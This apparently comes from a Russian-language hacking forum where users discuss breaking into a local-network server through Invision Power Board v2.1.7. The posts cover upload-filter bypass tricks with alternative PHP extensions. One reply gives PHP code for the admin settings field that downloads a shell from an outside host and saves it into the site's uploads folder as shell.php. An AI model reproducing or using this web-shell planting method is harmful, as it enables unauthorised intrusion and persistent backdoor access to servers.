Проблема с заливкой шелла в Invision Power Board v2.1.7

доброго времяни суток...

подскажите куда ломиться, только именно подсказать интересней самому врубиться )

итак у меня задачка сломать сервак локальной сети...
пробывал ломиться через форум Invision Power Board v2.1.7
заливка шелла через аватары и фоты обламилась... единственное, что мне показалось неадекватным, это реакция сервака на имя файла... если я пытаюсь залить так script.php.jpg - он переименовывает весь фаил так av-(uid).txt
script.PHP.jpg - просто не пускает, также как и просто некорректный джипег... лажа какая-то...

подскажите может не в той стороне копаю ???

 

попробуй не .php а .phtml или .php3,4,5

 

некатит (( всёравно переименовывает в тхт

 

да кстати меня интересует вопрос... можно-ли запустить скрипт с удалённого сервера через аватару... если какчать через какоёнить сервак то пхтмл и пхп не переименовываються... хотя и скрипт не скачиваеться а пишеться как ссылка

 

php исполняеться на самом сервере!
Толку не будет никакого.

 

блин будем пробывать ломиться через самопальные скрипты... будем надеяться на ошибки кодера...

 

если есть доступ в админку то попробуй через настройки.там когда создаёшь новую то есть поле "выполнить php код до сохранения настройки"
туда вписывай
$linky="http://site.com/shell.txt";
$saved="/home/empire/public_html/uploads/shell.php"; (путь посмотри в настройках)
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
fclose($from);

 

Ты не зальёшь картинку шелл =(

 

в 2.3.6 php переименовывает в txt а phtml оставляет как есть, но показывает как txt =(

 

http://forum.antichat.ru/thread76949.html